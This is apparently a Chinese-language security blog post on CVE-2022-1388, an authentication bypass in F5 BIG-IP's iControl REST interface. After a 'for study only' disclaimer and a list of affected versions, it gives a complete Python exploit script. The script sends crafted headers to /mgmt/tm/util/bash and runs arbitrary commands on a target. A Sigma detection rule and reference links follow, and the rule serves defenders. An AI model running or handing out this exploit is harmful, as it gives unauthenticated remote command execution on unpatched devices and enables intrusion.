简介
此操作仅用于技术交流和学习研究使用,请勿用于非法攻击,否则造成一切后果与本人无关
在F5 BIG-IP 16.1.x 16.1.2.2之前的版本、15.1.5.1之前的15.1.x版本、14.1.4.6之前的14.1.x版本、13.1.5之前的13.1.x版本以及所有12.1.x和11.6.x版本,未公开的请求可能会绕过iControl REST身份验证。注意:未评估已达到技术支持终止(EoTS)的软件版本。
此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务。
Poc/exp
具体POC可参考:
#!/usr/bin/python3
import argparse
import requests
import urllib3
urllib3.disable_warnings()
def exploit(target, command):
url = f'https://{target}/mgmt/tm/util/bash'
headers = {
'Host': '127.0.0.1',
'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
'X-F5-Auth-Token': 'asdf',
'Connection': 'X-F5-Auth-Token',
'Content-Type': 'application/json'
}
j = {"command":"run","utilCmdArgs":"-c '{0}'".format(command)}
r = requests.post(url, headers=headers, json=j, verify=False)
r.raise_for_status()
if ( r.status_code != 204 and r.headers["content-type"].strip().startswith("application/json")):
print(r.json()['commandResult'].strip())
else:
print("Response is empty! Target does not seems to be vulnerable..")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
parser.add_argument('-c', '--command', help='The command to execute')
args = parser.parse_args()
exploit(args.target, args.command)
检测规则
title: F5-BIG-IP-RCE(CVE-2022-1388)
status: experimental
description: F5 recently patched a critical vulnerability in their BIG-IP iControl REST endpoint CVE-2022-1388. This vulnerability is particularly worrisome for users because it is simple to exploit and provides an attacker with a method to execute arbitrary system commands.
references:
- https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
- https://www.randori.com/blog/vulnerability-analysis-cve-2022-1388/
author: 12306Br0
date: 2022/05/15
tags:
- attack.t1190
logsource:
category: webserver
detection:
selection:
cs-method: 'POST'
c-uri|contains|all:
- '/mgmt/tm/util/bash'
cs-Connection: '*X-F5-Auth-Token*'
cs-X-F5-Auth-Token: '*'
cs-Authorization: '*'
condition: selection
falsepositives:
- Unknown
level: critical
tags:
- attack.t1190
- cve.2022.1388
参考推荐
CVE-2022-1388
https://github.com/horizon3ai/CVE-2022-1388
F5 BIG-IP未授权RCE(CVE-2022-1388)分析